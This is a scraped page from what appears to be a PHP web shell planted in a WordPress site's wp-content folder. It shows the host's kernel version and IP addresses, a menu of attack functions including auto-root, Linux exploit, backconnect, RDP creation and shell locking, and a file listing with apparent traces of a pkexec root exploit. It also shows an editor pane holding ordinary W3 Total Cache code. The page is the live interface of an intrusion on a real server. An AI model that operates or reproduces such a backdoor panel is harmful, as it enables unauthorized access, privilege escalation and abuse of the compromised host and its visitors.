Linux premium134.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.104 | : 216.73.216.11
Cant Read [ /etc/named.conf ]
?8.1.34
mfbsrygq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
mfbsrygq /
public_html /
wp-content /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
.pkexec
[ DIR ]
drwxr-xr-x
?;
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
?;
ai1wm-backups
[ DIR ]
drwxr-xr-x
?;
cache
[ DIR ]
drwxr-xr-x
?;
mu-plugins
[ DIR ]
drwxr-xr-x
?;
plugins
[ DIR ]
drwxr-xr-x
?;
themes
[ DIR ]
drwxr-xr-x
?;
upgrade
[ DIR ]
drwxr-xr-x
?;
upgrade-temp-backup
[ DIR ]
drwxr-xr-x
?;
uploads
[ DIR ]
drwxrwxrwx
?;
w3tc-config
[ DIR ]
drwxr-xr-x
?;
wpdm-assets
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
advanced-cache.php
1.26
KB
-rw-r--r--
db.php
2.38
KB
-rw-r--r--
index.php
28
B
-r--r--r--
object-cache.php
10.5
KB
-rw-r--r--
temp-write-test-6639f75489f933...
0
B
-rw-r--r--
temp-write-test-66aa962de5d867...
0
B
-rw-r--r--
temp-write-test-66ac02619e4783...
0
B
-rw-r--r--
temp-write-test-678af2790933f2...
0
B
-rw-r--r--
temp-write-test-67916f123cde14...
0
B
-rw-r--r--
temp-write-test-69b587baa1c167...
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : advanced-cache.php
<?php /** * File: advanced-cache.php * * W3 Total Cache advanced cache module. * * @package W3TC */ defined( 'ABSPATH' ) || die(); global $w3tc_start_microtime; $w3tc_start_microtime = microtime( true ); /** * Abort W3TC loading if WordPress is upgrading. */ if ( defined( 'WP_INSTALLING' ) && WP_INSTALLING ) { return; } if ( ! defined( 'W3TC_IN_MINIFY' ) ) { if ( ! defined( 'W3TC_DIR' ) ) { define( 'W3TC_DIR', ( defined( 'WP_PLUGIN_DIR' ) ? WP_PLUGIN_DIR : WP_CONTENT_DIR . '/plugins' ) . '/w3-total-cache' ); } if ( ! @is_dir( W3TC_DIR ) || ! file_exists( W3TC_DIR . '/w3-total-cache-api.php' ) ) { if ( defined( 'WP_ADMIN' ) ) { // Only display errors in wp-admin. printf( '<strong>W3 Total Cache Error:</strong> some files appear to be missing or out of place. Please re-install plugin or remove <strong>%s</strong>. <br />', __FILE__ ); } } else { require_once W3TC_DIR . '/w3-total-cache-api.php'; if ( class_exists( '\W3TC\Dispatcher' ) ) { $w3tc_redirect = \W3TC\Dispatcher::component( 'Mobile_Redirect' ); $w3tc_redirect->process(); $w3tc_config = \W3TC\Dispatcher::config(); if ( $w3tc_config->get_boolean( 'pgcache.enabled' ) ) { $o = \W3TC\Dispatcher::component( 'PgCache_ContentGrabber' ); $o->process(); } } } }
Close